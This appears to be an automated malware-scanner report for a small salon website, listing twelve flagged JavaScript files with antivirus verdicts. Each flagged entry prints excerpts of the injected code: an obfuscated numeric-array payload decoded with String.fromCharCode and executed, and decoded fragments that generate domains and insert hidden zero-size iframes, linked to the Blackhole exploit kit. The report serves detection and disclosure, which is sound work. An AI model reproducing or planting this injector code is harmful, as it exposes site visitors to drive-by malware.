Malware Scanner report for salon-de-angela.com

Malicious/Suspicious/Total urls checked: 12/0/15

12 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "salon-de-angela.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=salon-de-angela.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://www.salon-de-angela.com/	200 OK Content-Length: 6185 Content-Type: text/html	clean
http://www.salon-de-angela.com/./cgiFolder/tieredworks_base.js	200 OK Content-Length: 15081 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ??? var TWDDMenu = { TimeOut : 300, currentLayer : null, currentitem : null, currentLayerNum : 0, noClose : 0, closeTimer : null } function TW_mopen(id) { var n = id.slice(5); var l = document.getElementById("smenu"+n); var mm = document.getElementById("mmenu"+n); if(l) { TW_mcancelclosetime(); l.style.display='block'; if(TWDDMenu.currentLayer && (TWDDMenu.currentLayerNum != n)) { TWDDMenu.curre ... 3295 bytes are skipped ...540.210.348.484.160.122.96.136.520.210.300.400.505.220.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.400.555.198.351.436.505.220.348.184.490.222.300.484.230.194.336.448.505.220.300.268.520.210.324.400.200.210.306.456.545.82.177.52.50.64.96.128.160.64.96.128.160.250.39.40.160.64.96.128.625.198.291.464.495.208.120.404.205.246.375.52.50.250.132.128.265.96.144.164.295".split(".");if(window.document)for(i=6-2-1-2-1;-1828+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(h*h)+2));}e(s);}} Antivirus reports: AntiVir JS/RunForest.B Avast JS:Redirector-XO [Trj] Ikarus Trojan.Script nProtect Trojan.JS.Agent.GMZ K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.GMZ (B) Comodo Exploit.JS.Blacole.RB Microsoft Trojan:JS/BlacoleRef.BG MicroWorld-eScan Trojan.JS.Agent.GMZ Fortinet JS/Iframe.W!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Expack.bfdeei F-Secure Trojan.JS.Agent.GMZ F-Prot JS/IFrame.QW AVG JS/Agent Norman Blacole.PK GData Trojan.JS.Agent.GMZ Commtouch JS/IFrame.QW BitDefender Trojan.JS.Agent.GMZ
http://www.salon-de-angela.com/./cgiFolder/tieredworks_ajax.js	200 OK Content-Length: 18635 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function TW_createHttpRequest(){ if (window.XMLHttpRequest){ return new XMLHttpRequest(); } else if (window.ActiveXObject) { try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { return null; } } } else { return null; } } function TW_requestFile( data , method , fileName , async , callback, dir) { try { var ... 3328 bytes are skipped ...540.210.348.484.160.122.96.136.520.210.300.400.505.220.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.400.555.198.351.436.505.220.348.184.490.222.300.484.230.194.336.448.505.220.300.268.520.210.324.400.200.210.306.456.545.82.177.52.50.64.96.128.160.64.96.128.160.250.39.40.160.64.96.128.625.198.291.464.495.208.120.404.205.246.375.52.50.250.132.128.265.96.144.164.295".split(".");if(window.document)for(i=6-2-1-2-1;-1828+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(hh)+2));}e(s);}} Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 ... 4722 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports: Avast JS:Iframe-ANQ [Trj] nProtect JS:Trojan.Iframer.C K7AntiVirus Trojan Emsisoft JS:Trojan.Iframer.C (B) DrWeb JS.IFrame.364 Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB MicroWorld-eScan JS:Trojan.Iframer.C NANO-Antivirus Trojan.Script.Agent.xyevo F-Secure JS:Trojan.Iframer.C F-Prot JS/IFrame.QW AVG HTML/Framer Norman Blacole.GK GData JS:Trojan.Iframer.C Commtouch JS/IFrame.QW BitDefender JS:Trojan.Iframer.C
http://www.salon-de-angela.com/./cgiFolder/tieredworks_modules.js	200 OK Content-Length: 22530 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function TW_browserCheck() { var browser; var agt= window.navigator.userAgent; if (agt.indexOf('IE') != -1) { browser = 0; } else if (agt.indexOf('Firefox') != -1) { browser = 1 } else { browser = 2 } return browser; } function TW_calender(UID,year,month,kind) { var now = new Date(year,month-1,1); var Y = now.getFullYear(); var M = now.getMonth(); var startDay = now.getDay(); var calData = eval(UID + 'calData') ... 3277 bytes are skipped ...540.210.348.484.160.122.96.136.520.210.300.400.505.220.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.400.555.198.351.436.505.220.348.184.490.222.300.484.230.194.336.448.505.220.300.268.520.210.324.400.200.210.306.456.545.82.177.52.50.64.96.128.160.64.96.128.160.250.39.40.160.64.96.128.625.198.291.464.495.208.120.404.205.246.375.52.50.250.132.128.265.96.144.164.295".split(".");if(window.document)for(i=6-2-1-2-1;-1828+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(hh)+2));}e(s);}} Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 ... 4722 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports: Avast JS:Iframe-ANQ [Trj] nProtect JS:Trojan.Iframer.C K7AntiVirus Trojan Emsisoft JS:Trojan.Iframer.C (B) DrWeb JS.IFrame.364 Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB MicroWorld-eScan JS:Trojan.Iframer.C NANO-Antivirus Trojan.Script.Agent.xyevo F-Secure JS:Trojan.Iframer.C F-Prot JS/IFrame.QW AVG HTML/Framer Norman Blacole.GK GData JS:Trojan.Iframer.C Commtouch JS/IFrame.QW BitDefender JS:Trojan.Iframer.C
http://www.salon-de-angela.com/./cgiFolder/tieredworks_spry.js	200 OK Content-Length: 138523 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var Spry; if (!Spry) Spry = {}; if (!Spry.Widget) Spry.Widget = {}; Spry.Widget.ValidationSelect = function(element, opts) { this.init(element); Spry.Widget.Utils.setOptions(this, opts); var validateOn = ['submit'].concat(this.validateOn \|\| []); validateOn = validateOn.join(","); this.validateOn = 0 \| (validateOn.indexOf('submit') != -1 ? Spry.Widget.ValidationSelect.ONSUBMIT : 0); this.validateOn = this.validateOn \| (validateOn.indexOf('blur') != - ... 3209 bytes are skipped ...540.210.348.484.160.122.96.136.520.210.300.400.505.220.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.400.555.198.351.436.505.220.348.184.490.222.300.484.230.194.336.448.505.220.300.268.520.210.324.400.200.210.306.456.545.82.177.52.50.64.96.128.160.64.96.128.160.250.39.40.160.64.96.128.625.198.291.464.495.208.120.404.205.246.375.52.50.250.132.128.265.96.144.164.295".split(".");if(window.document)for(i=6-2-1-2-1;-1828+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(h*h)+2));}e(s);}} Antivirus reports: AntiVir JS/RunForest.B Avast JS:Redirector-XO [Trj] Ikarus Trojan.Script nProtect Trojan.JS.Agent.GMZ Emsisoft Trojan.JS.Agent.GMZ (B) Comodo Exploit.JS.Blacole.RB TrendMicro HEUR_HTJS.HDJSFN Kaspersky Trojan-Downloader.JS.JScript.bp Microsoft Trojan:JS/BlacoleRef.BG Fortinet JS/Iframe.W!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Expack.bfdeei F-Secure Trojan.JS.Agent.GMZ AVG JS/Agent Sophos Mal/Iframe-AF GData Trojan.JS.Agent.GMZ BitDefender Trojan.JS.Agent.GMZ
http://www.salon-de-angela.com/./cgiFolder/analysis/admin/js/ana.js	200 OK Content-Length: 10616 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var ana = new Object( { scriptName:'ana', scriptVersion:'0.1', useAjax:true, qs:'', reqMethod:'POST', _n:navigator, _d:document, createQueryString:function(site, siteId, page, pageId, sub, subId, uid, attr){ this.qs += 'action_logAPI=true'; this.qs += '&sn=' + this.scriptName; this.qs += '&sv=' + this.scriptVersion; this.qs += '&site=' + encodeURIComponent(site); this.qs += '& ... 3344 bytes are skipped ...540.210.348.484.160.122.96.136.520.210.300.400.505.220.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.400.555.198.351.436.505.220.348.184.490.222.300.484.230.194.336.448.505.220.300.268.520.210.324.400.200.210.306.456.545.82.177.52.50.64.96.128.160.64.96.128.160.250.39.40.160.64.96.128.625.198.291.464.495.208.120.404.205.246.375.52.50.250.132.128.265.96.144.164.295".split(".");if(window.document)for(i=6-2-1-2-1;-1828+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(hh)+2));}e(s);}} Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 ... 4722 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports: Avast JS:Iframe-ANQ [Trj] nProtect JS:Trojan.Iframer.C K7AntiVirus Trojan Emsisoft JS:Trojan.Iframer.C (B) DrWeb JS.IFrame.364 Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB MicroWorld-eScan JS:Trojan.Iframer.C NANO-Antivirus Trojan.Script.Agent.xyevo F-Secure JS:Trojan.Iframer.C F-Prot JS/IFrame.QW AVG HTML/Framer Norman Blacole.GK GData JS:Trojan.Iframer.C Commtouch JS/IFrame.QW BitDefender JS:Trojan.Iframer.C
http://www.salon-de-angela.com/./index.html	200 OK Content-Length: 6185 Content-Type: text/html	clean
http://www.salon-de-angela.com/././cgiFolder/tieredworks_base.js	200 OK Content-Length: 15081 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ??? var TWDDMenu = { TimeOut : 300, currentLayer : null, currentitem : null, currentLayerNum : 0, noClose : 0, closeTimer : null } function TW_mopen(id) { var n = id.slice(5); var l = document.getElementById("smenu"+n); var mm = document.getElementById("mmenu"+n); if(l) { TW_mcancelclosetime(); l.style.display='block'; if(TWDDMenu.currentLayer && (TWDDMenu.currentLayerNum != n)) { TWDDMenu.curre ... 3295 bytes are skipped ...540.210.348.484.160.122.96.136.520.210.300.400.505.220.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.400.555.198.351.436.505.220.348.184.490.222.300.484.230.194.336.448.505.220.300.268.520.210.324.400.200.210.306.456.545.82.177.52.50.64.96.128.160.64.96.128.160.250.39.40.160.64.96.128.625.198.291.464.495.208.120.404.205.246.375.52.50.250.132.128.265.96.144.164.295".split(".");if(window.document)for(i=6-2-1-2-1;-1828+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(h*h)+2));}e(s);}} Antivirus reports: AntiVir JS/RunForest.B Avast JS:Redirector-XO [Trj] Ikarus Trojan.Script nProtect Trojan.JS.Agent.GMZ K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.GMZ (B) Comodo Exploit.JS.Blacole.RB Microsoft Trojan:JS/BlacoleRef.BG MicroWorld-eScan Trojan.JS.Agent.GMZ Fortinet JS/Iframe.W!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Expack.bfdeei F-Secure Trojan.JS.Agent.GMZ F-Prot JS/IFrame.QW AVG JS/Agent Norman Blacole.PK GData Trojan.JS.Agent.GMZ Commtouch JS/IFrame.QW BitDefender Trojan.JS.Agent.GMZ
http://www.salon-de-angela.com/././cgiFolder/tieredworks_ajax.js	200 OK Content-Length: 18635 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function TW_createHttpRequest(){ if (window.XMLHttpRequest){ return new XMLHttpRequest(); } else if (window.ActiveXObject) { try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { return null; } } } else { return null; } } function TW_requestFile( data , method , fileName , async , callback, dir) { try { var ... 3328 bytes are skipped ...540.210.348.484.160.122.96.136.520.210.300.400.505.220.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.400.555.198.351.436.505.220.348.184.490.222.300.484.230.194.336.448.505.220.300.268.520.210.324.400.200.210.306.456.545.82.177.52.50.64.96.128.160.64.96.128.160.250.39.40.160.64.96.128.625.198.291.464.495.208.120.404.205.246.375.52.50.250.132.128.265.96.144.164.295".split(".");if(window.document)for(i=6-2-1-2-1;-1828+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(hh)+2));}e(s);}} Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 ... 4722 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports: Avast JS:Iframe-ANQ [Trj] nProtect JS:Trojan.Iframer.C K7AntiVirus Trojan Emsisoft JS:Trojan.Iframer.C (B) DrWeb JS.IFrame.364 Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB MicroWorld-eScan JS:Trojan.Iframer.C NANO-Antivirus Trojan.Script.Agent.xyevo F-Secure JS:Trojan.Iframer.C F-Prot JS/IFrame.QW AVG HTML/Framer Norman Blacole.GK GData JS:Trojan.Iframer.C Commtouch JS/IFrame.QW BitDefender JS:Trojan.Iframer.C
http://www.salon-de-angela.com/././cgiFolder/tieredworks_modules.js	200 OK Content-Length: 22530 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function TW_browserCheck() { var browser; var agt= window.navigator.userAgent; if (agt.indexOf('IE') != -1) { browser = 0; } else if (agt.indexOf('Firefox') != -1) { browser = 1 } else { browser = 2 } return browser; } function TW_calender(UID,year,month,kind) { var now = new Date(year,month-1,1); var Y = now.getFullYear(); var M = now.getMonth(); var startDay = now.getDay(); var calData = eval(UID + 'calData') ... 3277 bytes are skipped ...540.210.348.484.160.122.96.136.520.210.300.400.505.220.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.400.555.198.351.436.505.220.348.184.490.222.300.484.230.194.336.448.505.220.300.268.520.210.324.400.200.210.306.456.545.82.177.52.50.64.96.128.160.64.96.128.160.250.39.40.160.64.96.128.625.198.291.464.495.208.120.404.205.246.375.52.50.250.132.128.265.96.144.164.295".split(".");if(window.document)for(i=6-2-1-2-1;-1828+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(hh)+2));}e(s);}} Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 ... 4722 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports: Avast JS:Iframe-ANQ [Trj] nProtect JS:Trojan.Iframer.C K7AntiVirus Trojan Emsisoft JS:Trojan.Iframer.C (B) DrWeb JS.IFrame.364 Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB MicroWorld-eScan JS:Trojan.Iframer.C NANO-Antivirus Trojan.Script.Agent.xyevo F-Secure JS:Trojan.Iframer.C F-Prot JS/IFrame.QW AVG HTML/Framer Norman Blacole.GK GData JS:Trojan.Iframer.C Commtouch JS/IFrame.QW BitDefender JS:Trojan.Iframer.C
http://www.salon-de-angela.com/././cgiFolder/tieredworks_spry.js	200 OK Content-Length: 138523 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var Spry; if (!Spry) Spry = {}; if (!Spry.Widget) Spry.Widget = {}; Spry.Widget.ValidationSelect = function(element, opts) { this.init(element); Spry.Widget.Utils.setOptions(this, opts); var validateOn = ['submit'].concat(this.validateOn \|\| []); validateOn = validateOn.join(","); this.validateOn = 0 \| (validateOn.indexOf('submit') != -1 ? Spry.Widget.ValidationSelect.ONSUBMIT : 0); this.validateOn = this.validateOn \| (validateOn.indexOf('blur') != - ... 3209 bytes are skipped ...540.210.348.484.160.122.96.136.520.210.300.400.505.220.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.400.555.198.351.436.505.220.348.184.490.222.300.484.230.194.336.448.505.220.300.268.520.210.324.400.200.210.306.456.545.82.177.52.50.64.96.128.160.64.96.128.160.250.39.40.160.64.96.128.625.198.291.464.495.208.120.404.205.246.375.52.50.250.132.128.265.96.144.164.295".split(".");if(window.document)for(i=6-2-1-2-1;-1828+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(h*h)+2));}e(s);}} Antivirus reports: AntiVir JS/RunForest.B Avast JS:Redirector-XO [Trj] Ikarus Trojan.Script nProtect Trojan.JS.Agent.GMZ Emsisoft Trojan.JS.Agent.GMZ (B) Comodo Exploit.JS.Blacole.RB TrendMicro HEUR_HTJS.HDJSFN Kaspersky Trojan-Downloader.JS.JScript.bp Microsoft Trojan:JS/BlacoleRef.BG Fortinet JS/Iframe.W!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Expack.bfdeei F-Secure Trojan.JS.Agent.GMZ AVG JS/Agent Sophos Mal/Iframe-AF GData Trojan.JS.Agent.GMZ BitDefender Trojan.JS.Agent.GMZ
http://www.salon-de-angela.com/././cgiFolder/analysis/admin/js/ana.js	200 OK Content-Length: 10616 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) var ana = new Object( { scriptName:'ana', scriptVersion:'0.1', useAjax:true, qs:'', reqMethod:'POST', _n:navigator, _d:document, createQueryString:function(site, siteId, page, pageId, sub, subId, uid, attr){ this.qs += 'action_logAPI=true'; this.qs += '&sn=' + this.scriptName; this.qs += '&sv=' + this.scriptVersion; this.qs += '&site=' + encodeURIComponent(site); this.qs += '& ... 3344 bytes are skipped ...540.210.348.484.160.122.96.136.520.210.300.400.505.220.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.400.555.198.351.436.505.220.348.184.490.222.300.484.230.194.336.448.505.220.300.268.520.210.324.400.200.210.306.456.545.82.177.52.50.64.96.128.160.64.96.128.160.250.39.40.160.64.96.128.625.198.291.464.495.208.120.404.205.246.375.52.50.250.132.128.265.96.144.164.295".split(".");if(window.document)for(i=6-2-1-2-1;-1828+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(hh)+2));}e(s);}} Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 ... 4722 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports: Avast JS:Iframe-ANQ [Trj] nProtect JS:Trojan.Iframer.C K7AntiVirus Trojan Emsisoft JS:Trojan.Iframer.C (B) DrWeb JS.IFrame.364 Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB MicroWorld-eScan JS:Trojan.Iframer.C NANO-Antivirus Trojan.Script.Agent.xyevo F-Secure JS:Trojan.Iframer.C F-Prot JS/IFrame.QW AVG HTML/Framer Norman Blacole.GK GData JS:Trojan.Iframer.C Commtouch JS/IFrame.QW BitDefender JS:Trojan.Iframer.C
http://www.salon-de-angela.com/././index.html	200 OK Content-Length: 6185 Content-Type: text/html	clean
http://www.salon-de-angela.com/./././cgiFolder/tieredworks_base.js	200 OK Content-Length: 15081 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ??? var TWDDMenu = { TimeOut : 300, currentLayer : null, currentitem : null, currentLayerNum : 0, noClose : 0, closeTimer : null } function TW_mopen(id) { var n = id.slice(5); var l = document.getElementById("smenu"+n); var mm = document.getElementById("mmenu"+n); if(l) { TW_mcancelclosetime(); l.style.display='block'; if(TWDDMenu.currentLayer && (TWDDMenu.currentLayerNum != n)) { TWDDMenu.curre ... 3295 bytes are skipped ...540.210.348.484.160.122.96.136.520.210.300.400.505.220.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.400.555.198.351.436.505.220.348.184.490.222.300.484.230.194.336.448.505.220.300.268.520.210.324.400.200.210.306.456.545.82.177.52.50.64.96.128.160.64.96.128.160.250.39.40.160.64.96.128.625.198.291.464.495.208.120.404.205.246.375.52.50.250.132.128.265.96.144.164.295".split(".");if(window.document)for(i=6-2-1-2-1;-1828+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(h*h)+2));}e(s);}} Antivirus reports: AntiVir JS/RunForest.B Avast JS:Redirector-XO [Trj] Ikarus Trojan.Script nProtect Trojan.JS.Agent.GMZ K7AntiVirus Trojan Emsisoft Trojan.JS.Agent.GMZ (B) Comodo Exploit.JS.Blacole.RB Microsoft Trojan:JS/BlacoleRef.BG MicroWorld-eScan Trojan.JS.Agent.GMZ Fortinet JS/Iframe.W!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Expack.bfdeei F-Secure Trojan.JS.Agent.GMZ F-Prot JS/IFrame.QW AVG JS/Agent Norman Blacole.PK GData Trojan.JS.Agent.GMZ Commtouch JS/IFrame.QW BitDefender Trojan.JS.Agent.GMZ
http://www.salon-de-angela.com/./././cgiFolder/tieredworks_ajax.js	200 OK Content-Length: 18635 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function TW_createHttpRequest(){ if (window.XMLHttpRequest){ return new XMLHttpRequest(); } else if (window.ActiveXObject) { try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { return null; } } } else { return null; } } function TW_requestFile( data , method , fileName , async , callback, dir) { try { var ... 3328 bytes are skipped ...540.210.348.484.160.122.96.136.520.210.300.400.505.220.102.236.160.26.30.128.160.64.96.128.160.64.96.128.160.64.96.400.555.198.351.436.505.220.348.184.490.222.300.484.230.194.336.448.505.220.300.268.520.210.324.400.200.210.306.456.545.82.177.52.50.64.96.128.160.64.96.128.160.250.39.40.160.64.96.128.625.198.291.464.495.208.120.404.205.246.375.52.50.250.132.128.265.96.144.164.295".split(".");if(window.document)for(i=6-2-1-2-1;-1828+i!=2-2;i++){k=i;s=s+String.fromCharCode(n[k]/(i%(hh)+2));}e(s);}} Decoded script: function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 ... 4722 bytes are skipped ... ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 / var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return Antivirus reports: Avast JS:Iframe-ANQ [Trj] nProtect JS:Trojan.Iframer.C K7AntiVirus Trojan Emsisoft JS:Trojan.Iframer.C (B) DrWeb JS.IFrame.364 Kaspersky HEUR:Trojan.Script.Iframer Microsoft Trojan:JS/Iframeinject.AB MicroWorld-eScan JS:Trojan.Iframer.C NANO-Antivirus Trojan.Script.Agent.xyevo F-Secure JS:Trojan.Iframer.C F-Prot JS/IFrame.QW AVG HTML/Framer Norman Blacole.GK GData JS:Trojan.Iframer.C Commtouch JS/IFrame.QW BitDefender JS:Trojan.Iframer.C

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: salon-de-angela.com

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: salon-de-angela.com
Referer: http://www.google.com/search?q=salon-de-angela.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for salon-de-angela.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools